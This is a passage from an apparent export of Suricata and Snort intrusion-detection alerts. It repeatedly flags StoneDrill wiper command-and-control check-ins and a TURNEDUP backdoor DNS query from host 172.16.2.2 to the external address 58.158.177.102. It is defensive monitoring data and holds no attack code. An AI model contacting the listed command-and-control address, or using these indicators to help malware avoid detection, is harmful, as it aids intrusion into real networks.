58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:59.730","05/28/2020-13:21:56.942324 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49703 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:57.800","05/28-13:21:56.682811 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49703 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:54.797","05/28-13:21:50.692100 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49701 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:52.728","05/28/2020-13:21:45.391479 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49700 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:52.728","05/28/2020-13:21:51.385442 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49701 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:47.792","05/28-13:21:45.117690 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49700 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:40.789","05/28-13:21:36.525164 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49699 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:37.725","05/28/2020-13:21:36.804878 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49699 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:33.769","05/28-13:21:29.902815 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49698 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:30.723","05/28/2020-13:21:30.195771 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49698 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:27.721","05/28/2020-13:21:24.247646 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49697 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:26.767","05/28-13:21:23.970189 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49697 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:20.719","05/28/2020-13:21:18.680552 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49695 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:19.764","05/28-13:21:18.410947 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49695 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:13.712","05/28/2020-13:21:12.129552 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49693 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:12.761","05/28-13:21:11.807254 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49693 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:11.760","05/28-13:21:09.190302 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49692 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:10.711","05/28/2020-13:21:06.865775 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49691 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:10.711","05/28/2020-13:21:09.470738 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49692 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:08.757","05/28-13:21:06.590259 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49691 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:05.756","05/28-13:21:02.806693 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49690 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:03.709","05/28/2020-13:21:03.260718 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49690 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:21:02.753","05/28-13:21:00.189766 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49689 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:21:00.707","05/28/2020-13:21:00.490952 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49689 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:59.751","05/28-13:20:57.519712 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49688 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:20:59.706","05/28/2020-13:20:57.797044 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49688 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:56.749","05/28-13:20:54.930480 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49687 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:20:56.705","05/28/2020-13:20:55.216110 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49687 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:53.748","05/28-13:20:52.066863 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49686 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:20:53.703","05/28/2020-13:20:52.641108 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49686 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:50.737","05/28-13:20:49.374459 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49685 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:20:50.702","05/28/2020-13:20:49.768176 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49685 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:49.736","05/28-13:20:43.226172 [**] [1:2825294:1] ETPRO TROJAN StoneDrill POST Login Request [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49682 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:20:49.736","05/28-13:20:44.050150 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49683 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:20:49.736","05/28-13:20:46.744672 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49684 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:20:49.701","05/28/2020-13:20:42.904575 [**] [1:2024732:5] ET MALWARE DNS Query For TURNEDUP.Backdoor CnC (googlmail) [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {UDP} 172.16.2.2:57732 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:49.701","05/28/2020-13:20:43.498632 [**] [1:2825294:2] ETPRO MALWARE StoneDrill POST Login Request [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49682 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:49.701","05/28/2020-13:20:44.456351 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49683 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:20:49.701","05/28/2020-13:20:47.044963 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:49684 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:19:34.687","05/28/2020-13:19:28.013959 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50188 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:19:34.686","05/28-13:19:27.092278 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50188 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:19:19.684","05/28/2020-13:19:16.804378 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50178 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:19:19.683","05/28-13:19:16.519120 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50178 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:19:12.682","05/28/2020-13:19:06.252924 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50177 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:19:12.680","05/28-13:19:05.956598 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50177 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:18:57.676","05/28/2020-13:18:55.664095 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50170 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:18:57.676","05/28-13:18:55.352285 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50170 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:18:50.674","05/28-13:18:44.740331 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50150 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:18:50.674","05/28/2020-13:18:45.040291 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50150 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:18:35.672","05/28-13:18:33.948585 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50118 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:18:35.671","05/28/2020-13:18:34.473889 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50118 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:18:28.657","05/28/2020-13:18:23.643183 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:18:28.657","05/28-13:18:23.256740 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:18:13.610","05/28/2020-13:18:11.915692 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50111 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:18:13.610","05/28-13:18:11.618625 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50111 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:18:06.608","05/28/2020-13:18:01.273359 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50110 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:18:06.608","05/28-13:18:01.015501 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50110 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:51.605","05/28-13:17:50.414091 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50106 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:51.605","05/28/2020-13:17:50.731881 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50106 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:48.603","05/28/2020-13:17:45.042884 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50102 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:48.603","05/28-13:17:44.757604 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50102 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:41.598","05/28-13:17:39.181592 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50101 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:41.598","05/28/2020-13:17:39.457905 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50101 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:34.567","05/28/2020-13:17:33.898339 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50100 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:34.554","05/28-13:17:33.568527 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50100 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:31.564","05/28/2020-13:17:28.284330 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50097 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:31.553","05/28-13:17:27.991017 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50097 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:24.561","05/28/2020-13:17:22.639659 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50096 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:24.547","05/28-13:17:22.352269 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50096 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:17.556","05/28/2020-13:17:17.021695 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50095 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:17.533","05/28-13:17:16.398731 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50095 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:16.533","05/28-13:17:10.843225 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50092 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:17:14.555","05/28/2020-13:17:11.113841 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50092 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:17:01.530","05/28-13:16:57.726240 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50089 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:59.552","05/28/2020-13:16:58.018693 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50089 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:54.523","05/28-13:16:52.152664 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50087 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:52.550","05/28/2020-13:16:52.429203 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50087 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:49.549","05/28/2020-13:16:46.833669 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50085 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:47.521","05/28-13:16:46.396940 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50085 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:44.518","05/28-13:16:40.744091 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50083 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:42.545","05/28/2020-13:16:41.054784 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50083 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:37.515","05/28-13:16:28.545429 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50075 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:37.515","05/28-13:16:34.199205 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50082 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:35.543","05/28/2020-13:16:35.391599 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50082 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:32.541","05/28/2020-13:16:28.846647 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50075 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:25.537","05/28/2020-13:16:22.236061 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50058 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:22.512","05/28-13:16:21.238591 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50058 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:19.502","05/28-13:16:15.645649 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50051 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:18.534","05/28/2020-13:16:15.973775 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50051 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:12.501","05/28-13:16:10.034263 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50047 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:11.524","05/28/2020-13:16:10.330823 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50047 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:16:05.498","05/28-13:16:00.248673 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50040 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:16:04.521","05/28/2020-13:16:01.136995 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50040 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:58.495","05/28-13:15:54.577408 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50034 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:57.499","05/28/2020-13:15:54.866558 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50034 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:51.493","05/28-13:15:48.991354 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50026 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:50.496","05/28/2020-13:15:49.265686 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50026 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:48.491","05/28-13:15:46.426203 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50024 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:47.494","05/28/2020-13:15:46.709652 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50024 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:45.491","05/28/2020-13:15:44.135823 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] [Classification: Malware Command and Control Activity Detected] [Priority: 1] {TCP} 172.16.2.2:50023 -> 58.158.177.102:80","/var/log/suricata/fast.log" +"May 28, 2020 @ 13:15:45.489","05/28-13:15:43.838390 [**] [1:2808510:3] ETPRO TROJAN StoneDrill Wiper Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50023 -> 58.158.177.102:80","/var/log/snort/alert.fast" +"May 28, 2020 @ 13:15:42.490","05/28/2020-13:15:41.547457 [**] [1:2808510:5] ETPRO MALWARE StoneDrill Wiper Checkin 2 [**] 